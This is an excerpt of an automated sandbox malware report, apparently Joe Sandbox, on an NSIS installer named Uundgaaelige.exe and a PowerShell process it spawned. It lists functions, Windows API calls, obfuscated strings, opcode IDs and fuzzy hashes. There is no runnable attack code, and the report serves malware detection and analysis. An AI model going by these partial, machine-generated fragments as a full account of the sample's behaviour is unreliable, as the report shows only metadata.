                                                  • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsa17F6.tmp
                                                  • API String ID: 2962429428-631032090
                                                  • Opcode ID: bc9d59c8f271c216c0b0e312611624ce7a9d5bb861437aa17873a49c6d363409
                                                  • Instruction ID: a243388e665e2d569925beaf0092b2dcbae65f1e85c6ca02b15765f08549dd2e
                                                  • Opcode Fuzzy Hash: bc9d59c8f271c216c0b0e312611624ce7a9d5bb861437aa17873a49c6d363409
                                                  • Instruction Fuzzy Hash: 08E04F3250071896C620BF79AE494853B599B41735724C776F138B20F1C73899975AA9
                                                  Function 00405B1F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00406099: lstrcpynA.KERNEL32(?,?,00000400,004033DF,00423F20,NSIS Error,?,00000006,00000008,0000000A), ref: 004060A6
                                                    • Part of subcall function 00405ACA: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsa17F6.tmp,?,00405B36,C:\Users\user\AppData\Local\Temp\nsa17F6.tmp,C:\Users\user\AppData\Local\Temp\nsa17F6.tmp,77273410,?,77272EE0,00405881,?,77273410,77272EE0,00000000), ref: 00405AD8
                                                    • Part of subcall function 00405ACA: CharNextA.USER32(00000000), ref: 00405ADD
                                                    • Part of subcall function 00405ACA: CharNextA.USER32(00000000), ref: 00405AF1
                                                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsa17F6.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsa17F6.tmp,C:\Users\user\AppData\Local\Temp\nsa17F6.tmp,77273410,?,77272EE0,00405881,?,77273410,77272EE0,00000000), ref: 00405B72
                                                  • GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsa17F6.tmp,C:\Users\user\AppData\Local\Temp\nsa17F6.tmp,C:\Users\user\AppData\Local\Temp\nsa17F6.tmp,C:\Users\user\AppData\Local\Temp\nsa17F6.tmp,C:\Users\user\AppData\Local\Temp\nsa17F6.tmp,C:\Users\user\AppData\Local\Temp\nsa17F6.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsa17F6.tmp,C:\Users\user\AppData\Local\Temp\nsa17F6.tmp,77273410,?,77272EE0,00405881,?,77273410,77272EE0), ref: 00405B82
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsa17F6.tmp
                                                  • API String ID: 3248276644-223556267
                                                  • Opcode ID: c6667372e5261f6f491ce2a3369269f5050a05521b0262897edc27dc6412bb0c
                                                  • Instruction ID: f7918bca05de5a67ada1f7886cb37670742315f8bcd1f0c25b92126024abb592
                                                  • Opcode Fuzzy Hash: c6667372e5261f6f491ce2a3369269f5050a05521b0262897edc27dc6412bb0c
                                                  • Instruction Fuzzy Hash: 5DF0F425205E6516C722323A0C45AAF6964CE92324709423BF891B22C3CA3CB8429DBD
                                                  Function 00405134 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • IsWindowVisible.USER32(?), ref: 00405163
                                                  • CallWindowProcA.USER32(?,?,?,?), ref: 004051B4
                                                    • Part of subcall function 004041A6: SendMessageA.USER32(00010408,00000000,00000000,00000000), ref: 004041B8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: Window$CallMessageProcSendVisible
                                                  • String ID:
                                                  • API String ID: 3748168415-3916222277
                                                  • Opcode ID: cef517e8acf1b00021c4c6b190ff76a2e6404192bdc33fc547d340bfee77a79a
                                                  • Instruction ID: c2e14b81eed27f6ef80c9e529a4f942fbf68e082709ee8d6c9922b6f58a3139d
                                                  • Opcode Fuzzy Hash: cef517e8acf1b00021c4c6b190ff76a2e6404192bdc33fc547d340bfee77a79a
                                                  • Instruction Fuzzy Hash: 7801B131900608AFEF218F41DD80F6B3676EB84750F244137FA00BA1D1C7799D929E6D
                                                  Function 00405A78 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402E04,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Uundgaaelige.exe,C:\Users\user\Desktop\Uundgaaelige.exe,80000000,00000003), ref: 00405A7E
                                                  • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E04,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Uundgaaelige.exe,C:\Users\user\Desktop\Uundgaaelige.exe,80000000,00000003), ref: 00405A8C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: CharPrevlstrlen
                                                  • String ID: C:\Users\user\Desktop
                                                  • API String ID: 2709904686-3443045126
                                                  • Opcode ID: a2cb5c10c54eab45be364f275a3e0fd7f40b7dc80b72c69925d8ec85e0f8a492
                                                  • Instruction ID: 40098e637bf6d505f922d12736ff559178fc12fa7d0ee67292c12de19d06dc46
                                                  • Opcode Fuzzy Hash: a2cb5c10c54eab45be364f275a3e0fd7f40b7dc80b72c69925d8ec85e0f8a492
                                                  • Instruction Fuzzy Hash: 6ED0A7729089702EF30393108C00B9F6A88CF16341F090062E480A7191C67C0C424BAD
                                                  Function 00405B97 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405DF2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BA7
                                                  • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405BBF
                                                  • CharNextA.USER32(00000000,?,00000000,00405DF2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD0
                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00405DF2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD9
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                  • String ID:
                                                  • API String ID: 190613189-0
                                                  • Opcode ID: 3b856c8c7d4e4c10c4bedc5fcb7273c416007e4233098a198b9b1013c6992f0c
                                                  • Instruction ID: c0798baac460c4c161baa60e5c3960505173fe7825234d44b9ee5cd82a8c1779
                                                  • Opcode Fuzzy Hash: 3b856c8c7d4e4c10c4bedc5fcb7273c416007e4233098a198b9b1013c6992f0c
                                                  • Instruction Fuzzy Hash: 29F06235105918AFCB02DFA9DD40D9EBBB8EF46350B2540B9F840FB211D674FE01ABA9

                                                  Executed Functions

                                                  Function 04D98578 Relevance: .3, Instructions: 281COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216288452717.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4d90000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f13e98f03838c973998257dbed4446c6243d728d4df327ff0ee8aabf0c97aec0
                                                  • Instruction ID: 64e27b54037c43eece609b8b6c84086f3b0c9c9247689bddd5a9058bb08966d1
                                                  • Opcode Fuzzy Hash: f13e98f03838c973998257dbed4446c6243d728d4df327ff0ee8aabf0c97aec0
                                                  • Instruction Fuzzy Hash: 2AB18E70E102098FDF10DFA9D88479EBBF2BF89744F148529E815EB294EB34AC45DB91
                                                  Function 04D98E48 Relevance: .3, Instructions: 266COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216288452717.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4d90000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 416077febfd818a4d2db08ebf8f516829d85424f04013c5d8931ec0377adae51
                                                  • Instruction ID: 8a124795395126eeadad8955d84fe563f52593a608f6a1e54fae5ccc37f519ea
                                                  • Opcode Fuzzy Hash: 416077febfd818a4d2db08ebf8f516829d85424f04013c5d8931ec0377adae51
                                                  • Instruction Fuzzy Hash: B2B18F70E002099FDF14DFA9C89579EBBF2BF88714F148529E815E7394EB34A885CB91
                                                  Function 076F4030 Relevance: 15.4, Strings: 12, Instructions: 373COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216295908565.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_76f0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4[2l$4[2l$4[2l$4[2l$4[2l$4[2l$4[2l$4[2l$4\2l$4\2l$@b2l$@b2l
                                                  • API String ID: 0-657060668
                                                  • Opcode ID: f596c53cac12d6f11f5e992ffff7ba24b8d9f19ca9596b290e722a44b8daf856
                                                  • Instruction ID: d5d5acac50e0e92410a07b579c7ff8e9132dcb04bd405ac7aeb9afafc5747033
                                                  • Opcode Fuzzy Hash: f596c53cac12d6f11f5e992ffff7ba24b8d9f19ca9596b290e722a44b8daf856
                                                  • Instruction Fuzzy Hash: 27E19EB0B00209DBCB14DBA8C445AAEBBE2AF84344F14C565EA126F795CF75EC42CF91
                                                  Function 08E31A8B Relevance: 14.8, Strings: 11, Instructions: 1085COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216299316355.0000000008E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_8e30000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (.#k$G2l$G2l$G2l$G2l$G2l$G2l$G2l$G2l$G2l$G2l
                                                  • API String ID: 0-734337710
                                                  • Opcode ID: 6183dacf56513574fea8b0a3bec128ecbea52c36093030b2c9b333e95c3c1561
                                                  • Instruction ID: f61e863519cd6f96813b9ea2ec1fafb1b639e9a2181b1d8141a743617965262f
                                                  • Opcode Fuzzy Hash: 6183dacf56513574fea8b0a3bec128ecbea52c36093030b2c9b333e95c3c1561
                                                  • Instruction Fuzzy Hash: C782E636B00214DFCB15CF69C448AAABBF2BF86316F14D0AEE9559B252DB31DC41CB91
                                                  Function 076F7960 Relevance: 13.1, Strings: 10, Instructions: 640COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216295908565.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_76f0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 1l$ 1l$$r2l$$r2l$G2l$G2l$G2l$G2l$G2l$G2l
                                                  • API String ID: 0-705626783
                                                  • Opcode ID: faa29eb6b4bd812cafc7550a25811f9e5dab8d29f91e2f6afaa7e4148e1cbef6
                                                  • Instruction ID: ce93de0f270735dd0859794ed10ba2d6b3afbc60621f8afab47e048d34729caf
                                                  • Opcode Fuzzy Hash: faa29eb6b4bd812cafc7550a25811f9e5dab8d29f91e2f6afaa7e4148e1cbef6
                                                  • Instruction Fuzzy Hash: E0223AB1B052468FCB259B78840166ABBE2AFC6311F5480BBDA578F391DA35CD42C7E1
                                                  Function 076F3266 Relevance: 11.8, Strings: 9, Instructions: 519COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216295908565.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_76f0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (.#k$4[2l$4[2l$4[2l$4[2l$4[2l$4[2l$\}-l$\}-l
                                                  • API String ID: 0-13597606
                                                  • Opcode ID: 11b672200d1a68858041e7dd13f861b704df40c1878eac87f2a0507d90da4d09
                                                  • Instruction ID: 1817b5b594b8e4f64e3bfe79a7c5ab0c8eb2c31b5dc8507dc4b40e9f9079fa79
                                                  • Opcode Fuzzy Hash: 11b672200d1a68858041e7dd13f861b704df40c1878eac87f2a0507d90da4d09
                                                  • Instruction Fuzzy Hash: AD225FB4B00219DFDB54CB65C881F69BBB2BB85304F1081A9EA16AF395DB75EC81CF41
                                                  Function 08E30048 Relevance: 10.2, Strings: 8, Instructions: 236COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216299316355.0000000008E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_8e30000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 1l$ 1l$4\2l$4\2l$4\2l$4\2l$@b2l$@b2l
                                                  • API String ID: 0-3857271794
                                                  • Opcode ID: dee6043351f3e1126591b29d3de9041f3aa2f57c2a4d5506f0af769c5e485015
                                                  • Instruction ID: 2a9560037fe8bc833e7d31305f8dfc099ff7cdf125a9be903fde40c9693a71ff
                                                  • Opcode Fuzzy Hash: dee6043351f3e1126591b29d3de9041f3aa2f57c2a4d5506f0af769c5e485015
                                                  • Instruction Fuzzy Hash: AC917C75A00218DFCB15CFA8C484AAEBBF2EF88315F15C5A9E805AB355CB36DC42CB51
                                                  Function 076F4688 Relevance: 9.7, Strings: 7, Instructions: 920COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216295908565.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_76f0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 1l$ 1l$(.#k$4\2l$4\2l$@b2l$@b2l
                                                  • API String ID: 0-2622778407
                                                  • Opcode ID: 0dfc20ee8e9db1afad9a9325a6bc0d0b9775cd0b8f1e379135ca121ca95a61e1
                                                  • Instruction ID: 3752e64ab52d8e4956ed2b477107b50ce82a8f6c796734f0f8300f722f675594
                                                  • Opcode Fuzzy Hash: 0dfc20ee8e9db1afad9a9325a6bc0d0b9775cd0b8f1e379135ca121ca95a61e1
                                                  • Instruction Fuzzy Hash: 86826CB4B00249DFCB14CB98C484B6EBBF2AB85715F108069DA16AF795CB76EC81CF41
                                                  Function 076F39DE Relevance: 9.3, Strings: 7, Instructions: 589COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216295908565.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_76f0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4[2l$4[2l$4[2l$\}-l$\}-l$\}-l$\}-l
                                                  • API String ID: 0-3544613709
                                                  • Opcode ID: ac607e16ab2f5d8fb9ca7e1ef66f3b4fa97eb1667981392138c89687998c7f2b
                                                  • Instruction ID: 1fc4b0c59da9d5183d6eabfc905537cfad8c3c0e2907ccaf19b5a56ee94cdb09
                                                  • Opcode Fuzzy Hash: ac607e16ab2f5d8fb9ca7e1ef66f3b4fa97eb1667981392138c89687998c7f2b
                                                  • Instruction Fuzzy Hash: BE323DB4A00215DFDB54CB69C881F69BBB2BB85704F14C1A9EA0AAF355DB71EC81CF41
                                                  Function 076FC5FE Relevance: 8.1, Strings: 6, Instructions: 559COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216295908565.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_76f0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4[2l$4[2l$4[2l$\}-l$\}-l$\}-l
                                                  • API String ID: 0-4056078217
                                                  • Opcode ID: 624bb91d71822dc93b2950404ec5196b8173dcf5b24ec7368f983a28d403a498
                                                  • Instruction ID: 32cca0d0defd691eb070f1a2e0f84c34993a12f7df2b688212729b70d70129b4
                                                  • Opcode Fuzzy Hash: 624bb91d71822dc93b2950404ec5196b8173dcf5b24ec7368f983a28d403a498
                                                  • Instruction Fuzzy Hash: A23262B4B00219DFDB54CB54CC40BA9BBB2EF85344F5084A9E90AAF395CB75ED818F91
                                                  Function 076FBF13 Relevance: 7.9, Strings: 6, Instructions: 442COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216295908565.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_76f0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (.#k$4[2l$4[2l$4[2l$\}-l$\}-l
                                                  • API String ID: 0-4092427566
                                                  • Opcode ID: 047475916fb41ef350a213fda98a8ff644f22df636cc31b6ce0a73e586e5d56e
                                                  • Instruction ID: f7b9700460ba88a59ea2038f0b6806ea89bbde8a62dc3056af035e1db5411ee1
                                                  • Opcode Fuzzy Hash: 047475916fb41ef350a213fda98a8ff644f22df636cc31b6ce0a73e586e5d56e
                                                  • Instruction Fuzzy Hash: B61270B4A00219DFDB54CB64CC41BADBBB2EF85304F5084A9E90A6F395CB75ED818F91
                                                  Function 076F4012 Relevance: 7.8, Strings: 6, Instructions: 310COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216295908565.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_76f0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4[2l$4[2l$4[2l$4[2l$4\2l$@b2l
                                                  • API String ID: 0-2689535892
                                                  • Opcode ID: 80e91ade0c9c5511c89f967e2483aba5c8367df17f601353c7e01245eacc8ca6
                                                  • Instruction ID: bf690b654da43bca60f52c307c9cc73e6b2568f6fa062d6b1e80ea3b4f6fa379
                                                  • Opcode Fuzzy Hash: 80e91ade0c9c5511c89f967e2483aba5c8367df17f601353c7e01245eacc8ca6
                                                  • Instruction Fuzzy Hash: 5BC1AEB0A00249DFCB14CBA4C485AAEBBF2AF84344F14C166DA166F795DB75EC42CF91
                                                  Function 076F3AE7 Relevance: 6.7, Strings: 5, Instructions: 430COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216295908565.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_76f0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4[2l$4[2l$4[2l$\}-l$\}-l
                                                  • API String ID: 0-3044509279
                                                  • Opcode ID: 9797bb9bb6499dfbcb361970b9d95fcd5e17af6e9075d81f0cff6c990b275975
                                                  • Instruction ID: b3e0a1ea4d3af62f228c4f2c052ae52e2d54a96cc3dac00b761025cc68747043
                                                  • Opcode Fuzzy Hash: 9797bb9bb6499dfbcb361970b9d95fcd5e17af6e9075d81f0cff6c990b275975
                                                  • Instruction Fuzzy Hash: 0C024EB4A00219DFDB14CB65C885F69BBB2FB85704F1081A9EA06AF395DB75EC81CF41
                                                  Function 076FC6E6 Relevance: 6.7, Strings: 5, Instructions: 406COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216295908565.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_76f0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4[2l$4[2l$4[2l$\}-l$\}-l
                                                  • API String ID: 0-3044509279
                                                  • Opcode ID: a690252c41ff57de51338ffa06a81f83d069ec56cb6eccd3084ce9a590c5266e
                                                  • Instruction ID: b0ad176aa5cb6fbde1dde03865fc926bca9d3249b8dfcfdbaa4c50dc4c973015
                                                  • Opcode Fuzzy Hash: a690252c41ff57de51338ffa06a81f83d069ec56cb6eccd3084ce9a590c5266e
                                                  • Instruction Fuzzy Hash: BF026FB4B00219DFDB54CB54CC40BA9BBB2EF85344F5084A9E90AAF395CB75ED818F91
                                                  Function 08E30000 Relevance: 5.2, Strings: 4, Instructions: 239COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216299316355.0000000008E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_8e30000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 1l$4\2l$4\2l$@b2l
                                                  • API String ID: 0-2489705653
                                                  • Opcode ID: 3c497740802723ec43a9b67d7d93c1a5e0fed9d61aa39b4dbabcf75b23725843
                                                  • Instruction ID: 1445c50152573434bda9cde7204a4ba1daa8777e43f64108af889a2c47a11e24
                                                  • Opcode Fuzzy Hash: 3c497740802723ec43a9b67d7d93c1a5e0fed9d61aa39b4dbabcf75b23725843
                                                  • Instruction Fuzzy Hash: 4BA1AE75A00258DFCB15CF68C488AA9BBF2EF89315F1594AAD805AF352C736EC81CF50
                                                  Function 076FF8A3 Relevance: 4.0, Strings: 3, Instructions: 263COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216295908565.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_76f0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: G2l$G2l$G2l
                                                  • API String ID: 0-2954507949
                                                  • Opcode ID: 01ba49b1f399d0fb7bccf3016582ff6fffa2a1a47a2b8af40d76693cafa8f443
                                                  • Instruction ID: 8187bc14cf7fbc0fb2a60479de75e2d9e0964dca6c26a64eadcf8fe7213161a3
                                                  • Opcode Fuzzy Hash: 01ba49b1f399d0fb7bccf3016582ff6fffa2a1a47a2b8af40d76693cafa8f443
                                                  • Instruction Fuzzy Hash: 6B91F2B1A0520ADFDF258F38C4506FA7BA1AF86251F18C06ADA57CB351DB35CD42CB91
                                                  Function 076F7944 Relevance: 3.9, Strings: 3, Instructions: 131COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216295908565.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_76f0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $r2l$A2lj$G2l
                                                  • API String ID: 0-3118141789
                                                  • Opcode ID: 5879a114982f80c2ec5ef445751cb171d5da10eff4a2832ea9f9f13c23347740
                                                  • Instruction ID: ff20444288cb1e0a04869a02b25c1b923c7dc091c65dd39116297add733d8542
                                                  • Opcode Fuzzy Hash: 5879a114982f80c2ec5ef445751cb171d5da10eff4a2832ea9f9f13c23347740
                                                  • Instruction Fuzzy Hash: 204129F0B01206CFDF168E34C841A6ABBE2AF56350F9545A5DA029F391D735DD42CBE1
                                                  Function 076F0778 Relevance: 2.8, Strings: 2, Instructions: 252COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216295908565.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_76f0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: G2l$G2l
                                                  • API String ID: 0-2463336331
                                                  • Opcode ID: f4e6b616e7cfd04ce0fcfe5e9b88a3e867d066f1f82894558c5957e4d34cddb9
